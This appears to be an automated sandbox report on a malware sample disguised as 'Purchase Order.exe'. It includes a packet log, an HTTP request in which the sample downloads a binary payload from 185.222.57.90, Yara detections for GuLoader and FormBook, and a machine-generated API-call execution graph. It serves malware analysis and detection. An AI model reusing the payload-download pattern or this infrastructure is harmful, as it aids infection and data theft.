                                            Nov 18, 2024 18:11:17.330621004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398849010 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398885965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398930073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398955107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398961067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398986101 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399194956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399209023 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399233103 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399255037 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399525881 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399538994 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399563074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399580956 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399971008 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399986982 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.400007963 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.400029898 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401572943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401617050 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401643991 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401676893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401698112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401732922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401990891 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402004004 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402017117 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402034044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402066946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402486086 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402498960 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402525902 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402540922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403898954 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.403939962 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403973103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404007912 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404028893 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404063940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404205084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404239893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445852995 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445892096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445925951 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445969105 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514400959 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514453888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514467001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514554024 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514619112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514759064 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514771938 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514786005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514816046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514841080 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.515275955 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515291929 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515340090 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517086029 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517137051 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517232895 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517249107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517291069 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517559052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517573118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517585039 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517586946 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517602921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517621040 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.518296003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518310070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518346071 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519368887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519413948 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519493103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519505024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519534111 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519553900 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519660950 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519701958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561665058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561686993 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561703920 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561781883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561841965 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629756927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629812956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629868031 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629880905 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629914999 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629935980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.630135059 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630153894 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630171061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630181074 CET4971180192.168.2.8185.222.57.90
                                            • 185.222.57.90
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.8 | 49711 | 185.222.57.90 | 80 | 6892 | C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Nov 18, 2024 18:11:15.523874044 CET | 175 | OUT | GET /zFSrvbrRquo53.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: 185.222.57.90
                                            Cache-Control: no-cache
                                            Nov 18, 2024 18:11:16.708092928 CET | 1236 | IN | HTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                            Accept-Ranges: bytes
                                            ETag: "2aaa7eb21639db1:0"
                                            Server: Microsoft-IIS/10.0
                                            Date: Mon, 18 Nov 2024 17:11:16 GMT
                                            Content-Length: 290368



                                            Target ID:0
                                            Start time:12:10:08
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:12:11:05
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:22.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:20.7%
                                              Total number of Nodes:1536
                                              Total number of Limit Nodes:43
4327->4328 4329 406694 5 API calls 4328->4329 4330 403414 #17 OleInitialize SHGetFileInfoW 4329->4330 4408 4062ba lstrcpynW 4330->4408 4333 403460 GetCommandLineW 4409 4062ba lstrcpynW 4333->4409 4335 403472 4336 405bbc CharNextW 4335->4336 4337 403497 CharNextW 4336->4337 4338 4035c1 GetTempPathW 4337->4338 4348 4034b0 4337->4348 4410 40335e 4338->4410 4340 4035d9 4341 403633 DeleteFileW 4340->4341 4342 4035dd GetWindowsDirectoryW lstrcatW 4340->4342 4420 402edd GetTickCount GetModuleFileNameW 4341->4420 4343 40335e 12 API calls 4342->4343 4346 4035f9 4343->4346 4344 405bbc CharNextW 4344->4348 4346->4341 4349 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4346->4349 4347 403647 4354 405bbc CharNextW 4347->4354 4390 4036ea 4347->4390 4403 4036fa 4347->4403 4348->4344 4351 4035ac 4348->4351 4353 4035aa 4348->4353 4352 40335e 12 API calls 4349->4352 4504 4062ba lstrcpynW 4351->4504 4358 40362b 4352->4358 4353->4338 4359 403666 4354->4359 4358->4341 4358->4403 4366 4036c4 4359->4366 4367 40372a 4359->4367 4360 403834 4363 4038b8 ExitProcess 4360->4363 4364 40383c GetCurrentProcess OpenProcessToken 4360->4364 4361 403714 4362 405920 MessageBoxIndirectW 4361->4362 4368 403722 ExitProcess 4362->4368 4369 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4364->4369 4370 403888 4364->4370 4371 405c97 18 API calls 4366->4371 4372 40588b 5 API calls 4367->4372 4369->4370 4373 406694 5 API calls 4370->4373 4375 4036d0 4371->4375 4376 40372f lstrcatW 4372->4376 4374 40388f 4373->4374 4377 4038a4 ExitWindowsEx 4374->4377 4380 4038b1 4374->4380 4375->4403 4505 4062ba lstrcpynW 4375->4505 4378 403740 lstrcatW 4376->4378 4379 40374b lstrcatW lstrcmpiW 4376->4379 4377->4363 4377->4380 4378->4379 4382 403767 4379->4382 4379->4403 4516 40140b 4380->4516 4383 403773 4382->4383 4384 40376c 4382->4384 4388 40586e 2 API calls 4383->4388 4387 4057f1 4 API calls 4384->4387 4386 4036df 4506 4062ba lstrcpynW 4386->4506 4391 403771 4387->4391 4392 403778 
SetCurrentDirectoryW 4388->4392 4448 4039aa 4390->4448 4391->4392 4393 403793 4392->4393 4394 403788 4392->4394 4515 4062ba lstrcpynW 4393->4515 4514 4062ba lstrcpynW 4394->4514 4397 4062dc 17 API calls 4398 4037d2 DeleteFileW 4397->4398 4399 4037df CopyFileW 4398->4399 4405 4037a1 4398->4405 4399->4405 4400 403828 4402 406080 36 API calls 4400->4402 4401 406080 36 API calls 4401->4405 4402->4403 4507 4038d0 4403->4507 4404 4062dc 17 API calls 4404->4405 4405->4397 4405->4400 4405->4401 4405->4404 4406 4058a3 2 API calls 4405->4406 4407 403813 CloseHandle 4405->4407 4406->4405 4407->4405 4408->4333 4409->4335 4411 40654e 5 API calls 4410->4411 4413 40336a 4411->4413 4412 403374 4412->4340 4413->4412 4414 405b8f 3 API calls 4413->4414 4415 40337c 4414->4415 4416 40586e 2 API calls 4415->4416 4417 403382 4416->4417 4519 405ddf 4417->4519 4523 405db0 GetFileAttributesW CreateFileW 4420->4523 4422 402f1d 4423 402f2d 4422->4423 4524 4062ba lstrcpynW 4422->4524 4423->4347 4425 402f43 4426 405bdb 2 API calls 4425->4426 4427 402f49 4426->4427 4525 4062ba lstrcpynW 4427->4525 4429 402f54 GetFileSize 4444 403050 4429->4444 4447 402f6b 4429->4447 4431 403059 4431->4423 4433 403089 GlobalAlloc 4431->4433 4538 403347 SetFilePointer 4431->4538 4432 403331 ReadFile 4432->4447 4537 403347 SetFilePointer 4433->4537 4434 4030bc 4438 402e79 6 API calls 4434->4438 4437 4030a4 4440 403116 31 API calls 4437->4440 4438->4423 4439 403072 4441 403331 ReadFile 4439->4441 4445 4030b0 4440->4445 4443 40307d 4441->4443 4442 402e79 6 API calls 4442->4447 4443->4423 4443->4433 4526 402e79 4444->4526 4445->4423 4445->4445 4446 4030ed SetFilePointer 4445->4446 4446->4423 4447->4423 4447->4432 4447->4434 4447->4442 4447->4444 4449 406694 5 API calls 4448->4449 4450 4039be 4449->4450 4451 4039c4 GetUserDefaultUILanguage 4450->4451 4452 4039d6 4450->4452 4539 406201 wsprintfW 4451->4539 4453 406188 3 API calls 4452->4453 4455 403a06 4453->4455 4457 403a25 lstrcatW 4455->4457 4458 406188 3 API calls 
4455->4458 4456 4039d4 4540 403c80 4456->4540 4457->4456 4458->4457 4461 405c97 18 API calls 4462 403a57 4461->4462 4463 403aeb 4462->4463 4465 406188 3 API calls 4462->4465 4464 405c97 18 API calls 4463->4464 4466 403af1 4464->4466 4468 403a89 4465->4468 4467 403b01 LoadImageW 4466->4467 4469 4062dc 17 API calls 4466->4469 4470 403ba7 4467->4470 4471 403b28 RegisterClassW 4467->4471 4468->4463 4472 403aaa lstrlenW 4468->4472 4476 405bbc CharNextW 4468->4476 4469->4467 4475 40140b 2 API calls 4470->4475 4473 403bb1 4471->4473 4474 403b5e SystemParametersInfoW CreateWindowExW 4471->4474 4477 403ab8 lstrcmpiW 4472->4477 4478 403ade 4472->4478 4473->4403 4474->4470 4479 403bad 4475->4479 4480 403aa7 4476->4480 4477->4478 4481 403ac8 GetFileAttributesW 4477->4481 4482 405b8f 3 API calls 4478->4482 4479->4473 4484 403c80 18 API calls 4479->4484 4480->4472 4483 403ad4 4481->4483 4485 403ae4 4482->4485 4483->4478 4486 405bdb 2 API calls 4483->4486 4487 403bbe 4484->4487 4548 4062ba lstrcpynW 4485->4548 4486->4478 4489 403bca ShowWindow 4487->4489 4490 403c4d 4487->4490 4492 406624 3 API calls 4489->4492 4549 4053f5 OleInitialize 4490->4549 4494 403be2 4492->4494 4493 403c53 4495 403c6f 4493->4495 4501 403c57 4493->4501 4496 403bf0 GetClassInfoW 4494->4496 4498 406624 3 API calls 4494->4498 4497 40140b 2 API calls 4495->4497 4499 403c04 GetClassInfoW RegisterClassW 4496->4499 4500 403c1a DialogBoxParamW 4496->4500 4497->4473 4498->4496 4499->4500 4502 40140b 2 API calls 4500->4502 4501->4473 4503 40140b 2 API calls 4501->4503 4502->4473 4503->4473 4504->4353 4505->4386 4506->4390 4508 4038e8 4507->4508 4509 4038da CloseHandle 4507->4509 4567 403915 4508->4567 4509->4508 4512 4059cc 67 API calls 4513 403703 OleUninitialize 4512->4513 4513->4360 4513->4361 4514->4393 4515->4405 4517 401389 2 API calls 4516->4517 4518 401420 4517->4518 4518->4363 4520 405dec GetTickCount GetTempFileNameW 4519->4520 4521 405e22 4520->4521 4522 40338d 4520->4522 4521->4520 4521->4522 4522->4340 
4523->4422 4524->4425 4525->4429 4527 402e82 4526->4527 4528 402e9a 4526->4528 4529 402e92 4527->4529 4530 402e8b DestroyWindow 4527->4530 4531 402ea2 4528->4531 4532 402eaa GetTickCount 4528->4532 4529->4431 4530->4529 4533 4066d0 2 API calls 4531->4533 4534 402eb8 CreateDialogParamW ShowWindow 4532->4534 4535 402edb 4532->4535 4536 402ea8 4533->4536 4534->4535 4535->4431 4536->4431 4537->4437 4538->4439 4539->4456 4541 403c94 4540->4541 4556 406201 wsprintfW 4541->4556 4543 403d05 4557 403d39 4543->4557 4545 403a35 4545->4461 4546 403d0a 4546->4545 4547 4062dc 17 API calls 4546->4547 4547->4546 4548->4463 4560 40427d 4549->4560 4551 40543f 4552 40427d SendMessageW 4551->4552 4553 405451 OleUninitialize 4552->4553 4553->4493 4554 405418 4554->4551 4563 401389 4554->4563 4556->4543 4558 4062dc 17 API calls 4557->4558 4559 403d47 SetWindowTextW 4558->4559 4559->4546 4561 404295 4560->4561 4562 404286 SendMessageW 4560->4562 4561->4554 4562->4561 4565 401390 4563->4565 4564 4013fe 4564->4554 4565->4564 4566 4013cb MulDiv SendMessageW 4565->4566 4566->4565 4568 403923 4567->4568 4569 4038ed 4568->4569 4570 403928 FreeLibrary GlobalFree 4568->4570 4569->4512 4570->4569 4570->4570 5417 701218dd 5418 70121900 5417->5418 5419 70121947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5418->5419 5420 70121935 GlobalFree 5418->5420 5421 70121272 2 API calls 5419->5421 5420->5419 5422 70121ad2 GlobalFree GlobalFree 5421->5422 5423 40190f 5424 402c41 17 API calls 5423->5424 5425 401916 5424->5425 5426 405920 MessageBoxIndirectW 5425->5426 5427 40191f 5426->5427 5428 401491 5429 405322 24 API calls 5428->5429 5430 401498 5429->5430 5431 401d14 5432 402c1f 17 API calls 5431->5432 5433 401d1b 5432->5433 5434 402c1f 17 API calls 5433->5434 5435 401d27 GetDlgItem 5434->5435 5436 402592 5435->5436 4764 405296 4765 4052a6 4764->4765 4766 4052ba 4764->4766 4767 4052ac 4765->4767 4777 405303 4765->4777 4768 4052c2 IsWindowVisible 4766->4768 4775 4052e2 4766->4775 4770 40427d 
SendMessageW 4767->4770 4771 4052cf 4768->4771 4768->4777 4769 405308 CallWindowProcW 4772 4052b6 4769->4772 4770->4772 4778 404bec SendMessageW 4771->4778 4775->4769 4783 404c6c 4775->4783 4777->4769 4779 404c4b SendMessageW 4778->4779 4780 404c0f GetMessagePos ScreenToClient SendMessageW 4778->4780 4781 404c43 4779->4781 4780->4781 4782 404c48 4780->4782 4781->4775 4782->4779 4792 4062ba lstrcpynW 4783->4792 4785 404c7f 4793 406201 wsprintfW 4785->4793 4787 404c89 4788 40140b 2 API calls 4787->4788 4789 404c92 4788->4789 4794 4062ba lstrcpynW 4789->4794 4791 404c99 4791->4777 4792->4785 4793->4787 4794->4791 5437 402598 5438 4025c7 5437->5438 5439 4025ac 5437->5439 5441 4025fb 5438->5441 5442 4025cc 5438->5442 5440 402c1f 17 API calls 5439->5440 5449 4025b3 5440->5449 5443 402c41 17 API calls 5441->5443 5444 402c41 17 API calls 5442->5444 5445 402602 lstrlenW 5443->5445 5446 4025d3 WideCharToMultiByte lstrlenA 5444->5446 5445->5449 5446->5449 5447 402645 5448 40262f 5448->5447 5450 405e62 WriteFile 5448->5450 5449->5447 5449->5448 5451 405e91 5 API calls 5449->5451 5450->5447 5451->5448 5452 70122c4f 5453 70122c67 5452->5453 5454 7012158f 2 API calls 5453->5454 5455 70122c82 5454->5455 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 SendMessageW 4897->4899 4900 404d9c 4898->4900 4899->4898 4901 404dd3 4900->4901 4903 404dab 4900->4903 4907 404231 18 API calls 4901->4907 4902 404fed 4908 405099 4902->4908 4914 405281 4902->4914 4919 405046 SendMessageW 4902->4919 4904 4062dc 17 API calls 4903->4904 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4902 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4902 4916 404fdf SendMessageW 4906->4916 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4921 4050c4 4911->4921 4922 4050bd ImageList_Destroy 4911->4922 4929 4050d4 4911->4929 4917 404bec 5 API calls 4912->4917 
4918 404231 18 API calls 4913->4918 4915 404298 8 API calls 4914->4915 4920 40528f 4915->4920 4916->4902 4933 404f7a 4917->4933 4934 404df5 4918->4934 4919->4914 4924 40505b SendMessageW 4919->4924 4925 4050cd GlobalFree 4921->4925 4921->4929 4922->4921 4923 405243 4923->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4923->4930 4927 40506e 4924->4927 4925->4929 4926 404eca GetWindowLongW SetWindowLongW 4928 404ee3 4926->4928 4939 40507f SendMessageW 4927->4939 4931 404f01 4928->4931 4932 404ee9 ShowWindow 4928->4932 4929->4923 4942 404c6c 4 API calls 4929->4942 4945 40510f 4929->4945 4930->4914 4953 404266 SendMessageW 4931->4953 4952 404266 SendMessageW 4932->4952 4933->4906 4934->4926 4935 404ec4 4934->4935 4938 404e45 SendMessageW 4934->4938 4940 404e81 SendMessageW 4934->4940 4941 404e92 SendMessageW 4934->4941 4935->4926 4935->4928 4938->4934 4939->4908 4940->4934 4941->4934 4942->4945 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4923 4946 40522f 4944->4946 4947 40513d SendMessageW 4945->4947 4949 405153 4945->4949 4954 404ba7 4946->4954 4947->4949 4948 4051b4 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4944 4949->4948 4949->4951 4951->4949 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4923 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 17 API calls 4960->4961 4962 404b66 4961->4962 4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 4964->4956 5456 40149e 5457 4014ac PostQuitMessage 5456->5457 5458 4022f7 5456->5458 5457->5458 5459 401c1f 5460 402c1f 17 API calls 5459->5460 5461 401c26 5460->5461 5462 402c1f 17 API calls 5461->5462 5463 401c33 5462->5463 5464 401c48 5463->5464 5465 402c41 17 API calls 5463->5465 5466 401c58 5464->5466 5467 402c41 17 API calls 5464->5467 5465->5464 5468 401c63 5466->5468 5469 401caf 5466->5469 5467->5466 5471 402c1f 17 API calls 5468->5471 5470 402c41 17 API calls 5469->5470 5472 401cb4 5470->5472 
5473 401c68 5471->5473 5475 402c41 17 API calls 5472->5475 5474 402c1f 17 API calls 5473->5474 5476 401c74 5474->5476 5477 401cbd FindWindowExW 5475->5477 5478 401c81 SendMessageTimeoutW 5476->5478 5479 401c9f SendMessageW 5476->5479 5480 401cdf 5477->5480 5478->5480 5479->5480 5481 402aa0 SendMessageW 5482 402ac5 5481->5482 5483 402aba InvalidateRect 5481->5483 5483->5482 5484 402821 5485 402827 5484->5485 5486 402ac5 5485->5486 5487 40282f FindClose 5485->5487 5487->5486 5488 4043a1 lstrlenW 5489 4043c0 5488->5489 5490 4043c2 WideCharToMultiByte 5488->5490 5489->5490 5491 404722 5492 40474e 5491->5492 5493 40475f 5491->5493 5552 405904 GetDlgItemTextW 5492->5552 5495 40476b GetDlgItem 5493->5495 5501 4047ca 5493->5501 5497 40477f 5495->5497 5496 404759 5499 40654e 5 API calls 5496->5499 5500 404793 SetWindowTextW 5497->5500 5507 405c3a 4 API calls 5497->5507 5498 4048ae 5550 404a5d 5498->5550 5554 405904 GetDlgItemTextW 5498->5554 5499->5493 5503 404231 18 API calls 5500->5503 5501->5498 5504 4062dc 17 API calls 5501->5504 5501->5550 5508 4047af 5503->5508 5509 40483e SHBrowseForFolderW 5504->5509 5505 4048de 5510 405c97 18 API calls 5505->5510 5506 404298 8 API calls 5511 404a71 5506->5511 5512 404789 5507->5512 5513 404231 18 API calls 5508->5513 5509->5498 5514 404856 CoTaskMemFree 5509->5514 5515 4048e4 5510->5515 5512->5500 5518 405b8f 3 API calls 5512->5518 5516 4047bd 5513->5516 5517 405b8f 3 API calls 5514->5517 5555 4062ba lstrcpynW 5515->5555 5553 404266 SendMessageW 5516->5553 5520 404863 5517->5520 5518->5500 5523 40489a SetDlgItemTextW 5520->5523 5527 4062dc 17 API calls 5520->5527 5522 4047c3 5525 406694 5 API calls 5522->5525 5523->5498 5524 4048fb 5526 406694 5 API calls 5524->5526 5525->5501 5538 404902 5526->5538 5528 404882 lstrcmpiW 5527->5528 5528->5523 5531 404893 lstrcatW 5528->5531 5529 404943 5556 4062ba lstrcpynW 5529->5556 5531->5523 5532 40494a 5533 405c3a 4 API calls 5532->5533 5534 404950 GetDiskFreeSpaceW 5533->5534 5537 404974 
MulDiv 5534->5537 5539 40499b 5534->5539 5536 405bdb 2 API calls 5536->5538 5537->5539 5538->5529 5538->5536 5538->5539 5540 404a0c 5539->5540 5541 404ba7 20 API calls 5539->5541 5542 404a2f 5540->5542 5544 40140b 2 API calls 5540->5544 5543 4049f9 5541->5543 5557 404253 EnableWindow 5542->5557 5546 404a0e SetDlgItemTextW 5543->5546 5547 4049fe 5543->5547 5544->5542 5546->5540 5549 404ade 20 API calls 5547->5549 5548 404a4b 5548->5550 5551 40467b SendMessageW 5548->5551 5549->5540 5550->5506 5551->5550 5552->5496 5553->5522 5554->5505 5555->5524 5556->5532 5557->5548 5558 70121671 5559 70121516 GlobalFree 5558->5559 5561 70121689 5559->5561 5560 701216cf GlobalFree 5561->5560 5562 701216a4 5561->5562 5563 701216bb VirtualFree 5561->5563 5562->5560 5563->5560 5564 4015a3 5565 402c41 17 API calls 5564->5565 5566 4015aa SetFileAttributesW 5565->5566 5567 4015bc 5566->5567 5568 401a30 5569 402c41 17 API calls 5568->5569 5570 401a39 ExpandEnvironmentStringsW 5569->5570 5571 401a4d 5570->5571 5573 401a60 5570->5573 5572 401a52 lstrcmpW 5571->5572 5571->5573 5572->5573 4571 402032 4572 402044 4571->4572 4573 4020f6 4571->4573 4574 402c41 17 API calls 4572->4574 4575 401423 24 API calls 4573->4575 4576 40204b 4574->4576 4581 402250 4575->4581 4577 402c41 17 API calls 4576->4577 4578 402054 4577->4578 4579 40206a LoadLibraryExW 4578->4579 4580 40205c GetModuleHandleW 4578->4580 4579->4573 4582 40207b 4579->4582 4580->4579 4580->4582 4594 406703 WideCharToMultiByte 4582->4594 4585 4020c5 4587 405322 24 API calls 4585->4587 4586 40208c 4588 402094 4586->4588 4589 4020ab 4586->4589 4591 40209c 4587->4591 4590 401423 24 API calls 4588->4590 4597 7012177b 4589->4597 4590->4591 4591->4581 4592 4020e8 FreeLibrary 4591->4592 4592->4581 4595 40672d GetProcAddress 4594->4595 4596 402086 4594->4596 4595->4596 4596->4585 4596->4586 4598 701217ae 4597->4598 4639 70121b63 4598->4639 4600 701217b5 4601 701218da 4600->4601 4602 701217c6 4600->4602 4603 701217cd 4600->4603 4601->4591 4689 
